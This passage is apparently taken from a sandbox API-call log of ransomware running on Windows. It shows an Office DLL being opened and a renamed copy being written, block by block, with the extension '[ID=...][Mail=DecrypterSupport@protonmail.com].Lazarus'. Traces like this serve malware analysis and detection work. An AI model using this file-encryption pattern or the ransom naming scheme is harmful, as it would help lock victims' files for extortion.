InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0096.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0096.928] AreFileApisANSI () returned 1 [0096.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll", lpUsedDefaultChar=0x0) returned 75 [0096.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0096.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0096.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0096.928] AreFileApisANSI () returned 1 [0096.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0096.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85c60 [0096.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 75 [0096.929] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.929] GetFileType (hFile=0x418) returned 0x1 [0096.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0096.929] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0096.929] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0096.929] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0096.929] CloseHandle (hObject=0x418) returned 1 [0096.930] AreFileApisANSI () returned 1 [0096.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0096.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85d00 [0096.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 75 [0096.930] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.930] GetFileType (hFile=0x418) returned 0x1 [0096.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0096.930] CloseHandle (hObject=0x418) returned 1 [0096.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0096.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0096.931] AreFileApisANSI () returned 1 [0096.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0096.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85940 [0096.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x85940, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 75 [0096.932] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d07d85, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d07d85, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0xf34d8)) returned 1 [0096.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85940 | out: hHeap=0x20000) returned 1 [0096.932] AreFileApisANSI () returned 1 [0096.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0096.932] GetLastError () returned 0x0 [0096.932] SetLastError (dwErrCode=0x0) [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0096.932] GetLastError () returned 0x0 [0096.932] SetLastError (dwErrCode=0x0) [0096.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a9b0 [0096.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0096.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0096.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0096.933] AreFileApisANSI () returned 1 [0096.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 137 [0096.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x112) returned 0x91ee8 [0096.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x91ee8, cchWideChar=137 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 137 [0096.933] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.933] GetFileType (hFile=0x418) returned 0x1 [0096.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91ee8 | out: hHeap=0x20000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0096.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0096.934] AreFileApisANSI () returned 1 [0096.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0096.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x84fe0 [0096.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 75 [0096.934] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.934] GetFileType (hFile=0x360) returned 0x1 [0096.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0096.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0096.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0096.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0096.934] GetLastError () returned 0x0 [0096.934] SetLastError (dwErrCode=0x0) [0096.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0096.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0096.934] GetLastError () returned 0x0 [0096.934] SetLastError (dwErrCode=0x0) [0096.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0096.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0096.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0096.934] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0096.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0096.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0096.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0096.936] GetLastError () returned 0x0 [0096.936] SetLastError (dwErrCode=0x0) [0096.937] GetLastError () returned 0x0 [0096.937] SetLastError (dwErrCode=0x0) [0096.937] GetLastError () returned 0x0 [0096.937] SetLastError (dwErrCode=0x0) [0096.937] GetLastError () returned 0x0 [0096.937] SetLastError (dwErrCode=0x0) [0096.938] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.938] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.939] GetLastError () returned 0x0 [0096.939] SetLastError (dwErrCode=0x0) [0096.939] GetLastError () returned 0x0 [0096.939] SetLastError (dwErrCode=0x0) [0096.940] GetLastError () returned 0x0 [0096.940] SetLastError (dwErrCode=0x0) [0096.940] GetLastError () returned 0x0 [0096.940] SetLastError (dwErrCode=0x0) [0096.940] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.940] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.940] GetLastError () returned 0x0 [0096.940] SetLastError (dwErrCode=0x0) [0096.940] GetLastError () returned 0x0 [0096.940] SetLastError (dwErrCode=0x0) [0096.940] GetLastError () returned 0x0 [0096.940] SetLastError (dwErrCode=0x0) [0096.941] GetLastError () returned 0x0 [0096.941] SetLastError (dwErrCode=0x0) [0096.941] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.941] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.941] GetLastError () returned 0x0 [0096.941] SetLastError (dwErrCode=0x0) [0096.941] GetLastError () returned 0x0 [0096.941] SetLastError (dwErrCode=0x0) [0096.941] GetLastError () returned 0x0 [0096.941] SetLastError (dwErrCode=0x0) [0096.941] GetLastError () returned 0x0 [0096.941] SetLastError (dwErrCode=0x0) [0096.942] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.942] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.942] GetLastError () returned 0x0 [0096.942] SetLastError (dwErrCode=0x0) [0096.942] GetLastError () returned 0x0 [0096.942] SetLastError (dwErrCode=0x0) [0096.942] GetLastError () returned 0x0 [0096.942] SetLastError (dwErrCode=0x0) [0096.942] GetLastError () returned 0x0 [0096.942] SetLastError (dwErrCode=0x0) [0096.942] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.943] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.943] GetLastError () returned 0x0 [0096.943] SetLastError (dwErrCode=0x0) [0096.943] GetLastError () returned 0x0 [0096.943] SetLastError (dwErrCode=0x0) [0096.943] GetLastError () returned 0x0 [0096.943] SetLastError (dwErrCode=0x0) [0096.943] GetLastError () returned 0x0 [0096.943] SetLastError (dwErrCode=0x0) [0096.943] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.943] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.944] GetLastError () returned 0x0 [0096.944] SetLastError (dwErrCode=0x0) [0096.944] GetLastError () returned 0x0 [0096.944] SetLastError (dwErrCode=0x0) [0096.944] GetLastError () returned 0x0 [0096.944] SetLastError (dwErrCode=0x0) [0096.944] GetLastError () returned 0x0 [0096.944] SetLastError (dwErrCode=0x0) [0096.944] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.944] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.945] GetLastError () returned 0x0 [0096.945] SetLastError (dwErrCode=0x0) [0096.945] GetLastError () returned 0x0 [0096.945] SetLastError (dwErrCode=0x0) [0096.945] GetLastError () returned 0x0 [0096.945] SetLastError (dwErrCode=0x0) [0096.945] GetLastError () returned 0x0 [0096.945] SetLastError (dwErrCode=0x0) [0096.945] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.945] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.945] GetLastError () returned 0x0 [0096.946] SetLastError (dwErrCode=0x0) [0096.946] GetLastError () returned 0x0 [0096.946] SetLastError (dwErrCode=0x0) [0096.946] GetLastError () returned 0x0 [0096.946] SetLastError (dwErrCode=0x0) [0096.946] GetLastError () returned 0x0 [0096.946] SetLastError (dwErrCode=0x0) [0096.946] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.946] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.946] GetLastError () returned 0x0 [0096.946] SetLastError (dwErrCode=0x0) [0096.946] GetLastError () returned 0x0 [0096.946] SetLastError (dwErrCode=0x0) [0096.947] GetLastError () returned 0x0 [0096.947] SetLastError (dwErrCode=0x0) [0096.947] GetLastError () returned 0x0 [0096.947] SetLastError (dwErrCode=0x0) [0096.947] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.947] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.947] GetLastError () returned 0x0 [0096.947] SetLastError (dwErrCode=0x0) [0096.947] GetLastError () returned 0x0 [0096.947] SetLastError (dwErrCode=0x0) [0096.947] GetLastError () returned 0x0 [0096.947] SetLastError (dwErrCode=0x0) [0096.948] GetLastError () returned 0x0 [0096.948] SetLastError (dwErrCode=0x0) [0096.948] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.948] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, 